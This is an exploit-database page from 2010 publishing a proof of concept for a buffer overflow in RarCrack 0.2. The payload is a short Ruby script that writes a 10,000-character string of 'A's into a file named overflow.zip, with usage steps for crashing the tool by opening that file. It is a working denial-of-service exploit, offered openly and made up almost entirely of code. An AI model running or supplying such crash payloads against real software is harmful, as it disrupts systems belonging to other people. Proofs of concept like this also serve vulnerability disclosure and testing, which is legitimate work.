Home / os / win7

[dos / poc] - RarCrack 0.2 Buffer Overflow POC

Posted on 20 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>RarCrack 0.2 Buffer Overflow POC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: dos / poc | Exploit author: The_UnKn@wn' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================ RarCrack 0.2 Buffer Overflow POC ================================ #!/usr/bin/env ruby # overflow.rb # # __________ ____ __ ______ _________ # / ____/ __ / __ / / / / __ / ____&lt; / # / / __/ /_/ / / / / / / / /_/ /___ / / # / /_/ / _, _/ /_/ / /_/ / ____/___/ // / # \____/_/ |_|\____/\____/_/ /_____//_/ # # # Title: RarCrack 0.2 Buffer Overflow POC # Date: 19.09.2010 # Author: The_UnKn@wn # Email: the_unknown [at] group51.org # Twitter: @The_UnKn0wn # Homepage: http://group51.org # Software Link: http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download # Version: 0.2 # Tested on: openSUSE 11.3 # CVE: none # # Impact: RarCrack doesn&#039;t check the length of the archive and while cracking it crashes. # # Usage: # $ ruby overflow.rb # $ ./rarcrack overflow.zip # text = &quot;A&quot;*10000 File.open(&quot;overflow.zip&quot;,&quot;w&quot;) do |l| l.puts(text) end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-20]</pre></body></html>

 

TOP